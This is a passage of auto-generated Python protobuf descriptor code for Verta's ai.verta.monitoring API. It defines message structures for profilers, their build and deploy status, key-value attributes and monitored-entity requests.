has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.Profiler.profiler_reference', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=211,
)
_CREATEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.CreateProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.CreateProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_CREATEPROFILERREQUEST = _descriptor.Descriptor(
name='CreateProfilerRequest',
full_name='ai.verta.monitoring.CreateProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.CreateProfilerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.CreateProfilerRequest.profiler_reference', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=213,
serialized_end=339,
)
_GETPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.GetProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.GetProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_GETPROFILERREQUEST = _descriptor.Descriptor(
name='GetProfilerRequest',
full_name='ai.verta.monitoring.GetProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.GetProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_GETPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=341,
serialized_end=434,
)
_UPDATEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.UpdateProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler', full_name='ai.verta.monitoring.UpdateProfilerRequest.Response.profiler', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=339,
)
_UPDATEPROFILERREQUEST = _descriptor.Descriptor(
name='UpdateProfilerRequest',
full_name='ai.verta.monitoring.UpdateProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.UpdateProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.UpdateProfilerRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='profiler_reference', full_name='ai.verta.monitoring.UpdateProfilerRequest.profiler_reference', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_UPDATEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=437,
serialized_end=575,
)
_LISTPROFILERSREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.ListProfilersRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profilers', full_name='ai.verta.monitoring.ListProfilersRequest.Response.profilers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=601,
serialized_end=661,
)
_LISTPROFILERSREQUEST = _descriptor.Descriptor(
name='ListProfilersRequest',
full_name='ai.verta.monitoring.ListProfilersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[_LISTPROFILERSREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=577,
serialized_end=661,
)
_DELETEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DeleteProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=290,
)
_DELETEPROFILERREQUEST = _descriptor.Descriptor(
name='DeleteProfilerRequest',
full_name='ai.verta.monitoring.DeleteProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.DeleteProfilerRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DELETEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=663,
serialized_end=710,
)
_BUILDSTATUSENUM = _descriptor.Descriptor(
name='BuildStatusEnum',
full_name='ai.verta.monitoring.BuildStatusEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_BUILDSTATUSENUM_BUILDSTATUS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=712,
serialized_end=812,
)
_DEPLOYSTATUSENUM = _descriptor.Descriptor(
name='DeployStatusEnum',
full_name='ai.verta.monitoring.DeployStatusEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_DEPLOYSTATUSENUM_DEPLOYSTATUS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=814,
serialized_end=928,
)
_PROFILERSTATUS = _descriptor.Descriptor(
name='ProfilerStatus',
full_name='ai.verta.monitoring.ProfilerStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.ProfilerStatus.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.ProfilerStatus.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='build_status', full_name='ai.verta.monitoring.ProfilerStatus.build_status', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='deploy_status', full_name='ai.verta.monitoring.ProfilerStatus.deploy_status', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=931,
serialized_end=1144,
)
_GETPROFILERSTATUSREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.GetProfilerStatusRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.GetProfilerStatusRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_GETPROFILERSTATUSREQUEST = _descriptor.Descriptor(
name='GetProfilerStatusRequest',
full_name='ai.verta.monitoring.GetProfilerStatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.GetProfilerStatusRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.GetProfilerStatusRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_GETPROFILERSTATUSREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1147,
serialized_end=1288,
)
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='statuses', full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response.statuses', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1362,
serialized_end=1427,
)
_FINDPROFILERSFORMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='FindProfilersForMonitoredEntityRequest',
full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.monitored_entity_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1291,
serialized_end=1427,
)
_KEYVALUE = _descriptor.Descriptor(
name='KeyValue',
full_name='ai.verta.monitoring.KeyValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.KeyValue.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.KeyValue.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value_type', full_name='ai.verta.monitoring.KeyValue.value_type', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1430,
serialized_end=1558,
)
_VALUETYPEENUM = _descriptor.Descriptor(
name='ValueTypeEnum',
full_name='ai.verta.monitoring.ValueTypeEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_VALUETYPEENUM_VALUETYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1560,
serialized_end=1632,
)
_ENABLEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.EnableProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.EnableProfilerRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_ENABLEPROFILERREQUEST = _descriptor.Descriptor(
name='EnableProfilerRequest',
full_name='ai.verta.monitoring.EnableProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.EnableProfilerRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.EnableProfilerRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='environment', full_name='ai.verta.monitoring.EnableProfilerRequest.environment', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ENABLEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1635,
serialized_end=1825,
)
_DISABLEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DisableProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.DisableProfilerRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_DISABLEPROFILERREQUEST = _descriptor.Descriptor(
name='DisableProfilerRequest',
full_name='ai.verta.monitoring.DisableProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.DisableProfilerRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.DisableProfilerRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DISABLEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1828,
serialized_end=1967,
)
_MONITOREDENTITY_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
_MONITOREDENTITY = _descriptor.Descriptor(
name='MonitoredEntity',
full_name='ai.verta.monitoring.MonitoredEntity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.MonitoredEntity.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.MonitoredEntity.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.MonitoredEntity.workspace_id', index=2,
number=5, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='created_at_timestamp_millis', full_name='ai.verta.monitoring.MonitoredEntity.created_at_timestamp_millis', index=3,
number=6, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='updated_at_timestamp_millis', full_name='ai.verta.monitoring.MonitoredEntity.updated_at_timestamp_millis', index=4,
number=7, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.MonitoredEntity.attributes', index=5,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='owner', full_name='ai.verta.monitoring.MonitoredEntity.owner', index=6,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.MonitoredEntity.resource_visibility', index=7,
number=10, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.MonitoredEntity.custom_permission', index=8,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version_number', full_name='ai.verta.monitoring.MonitoredEntity.version_number', index=9,
number=12, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_MONITOREDENTITY_ATTRIBUTESENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1970,
serialized_end=2414,
)
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
_CREATEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.Response.monitored_entity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2780,
serialized_end=2854,
)
_CREATEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='CreateMonitoredEntityRequest',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_id', index=1,
number=4, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_name', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_name', index=2,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.attributes', index=3,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.resource_visibility', index=4,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.custom_permission', index=5,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY, _CREATEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='workspace_identifier', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_identifier',
index=0, containing_type=None, fields=[]),
],
serialized_start=2417,
serialized_end=2890,
)
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
